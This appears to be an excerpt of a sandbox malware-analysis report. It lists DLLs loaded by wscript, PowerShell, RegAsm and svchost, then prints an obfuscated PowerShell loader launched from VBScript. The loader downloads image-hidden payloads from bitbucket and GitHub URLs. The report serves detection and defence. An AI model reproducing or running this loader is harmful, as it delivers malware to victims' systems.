              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Network");IWshNetwork2.ComputerName();IWshShell3.Run("powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#", "0")
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#